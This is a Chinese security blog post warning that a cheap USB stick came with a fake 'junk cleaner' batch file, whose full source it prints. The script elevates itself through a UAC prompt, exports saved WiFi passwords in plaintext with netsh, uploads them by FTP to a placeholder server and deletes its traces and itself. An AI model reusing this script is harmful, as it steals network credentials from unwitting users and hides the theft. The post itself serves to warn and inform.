关注我们

来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种

安云安云 安全文摘 2019-08-08 125524 0

在某宝个别店铺购买了小内存u盘到货后插入电脑,发现自带了一个名为电脑垃圾清理的小程序。

来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种


对就是这货

怀揣着这家店真好,还带了垃圾清理软件的想法,我试着运行了软件.

但是好像没有卵用.

正好小表弟好像对这个比较了解,我去问问他咋回事儿

小表弟下班回家后给我发了这么一段消息

来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种


嗯…

这是个bat脚本,他会打包本机的一些数据到一个文件夹里并全部发送到服务器上,然后删除痕迹和自身防止服务器信息泄露。

本文以WIFI信息获取并发送至服务器为例子

来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种


这个是代码

@echo off
>nul 2>&1 “%SYSTEMROOT%\system32\cacls.exe” “%SYSTEMROOT%\system32\config\system”
if ‘%errorlevel%’ NEQ ‘0’ (
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^(“Shell.Application”^) > “%temp%\getadmin.vbs”
echo UAC.ShellExecute “%~s0”, “”, “”, “runas”, 1 >> “%temp%\getadmin.vbs”
“%temp%\getadmin.vbs”
exit /B
:gotAdmin
if exist “%temp%\getadmin.vbs” ( del “%temp%\getadmin.vbs” )
md c:\win
netsh wlan export profile key=clear folder=c:\win
echo open 服务器IP>C:\config.txt
echo user FTP账号>>C:\config.txt
echo FTP密码>>C:\config.txt
echo mput c:\win\*.xml>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo ye

s>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo bye>>C:\config.txt

ftp -n -s:”C:\config.txt”

del C:\config.txt

del C:\win\*.xml

del %0

运行bat文件后,他会将电脑所连接过的WIFI信息发送至FTP目录

如图

来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种


随便打开其中一个就有了该WIFI相关信息

而假如bat批处理文件是一些远程下载运行的指令呢.

你猜猜后果是啥

原文由http://www.qisafe.net/?p=261

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢0发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址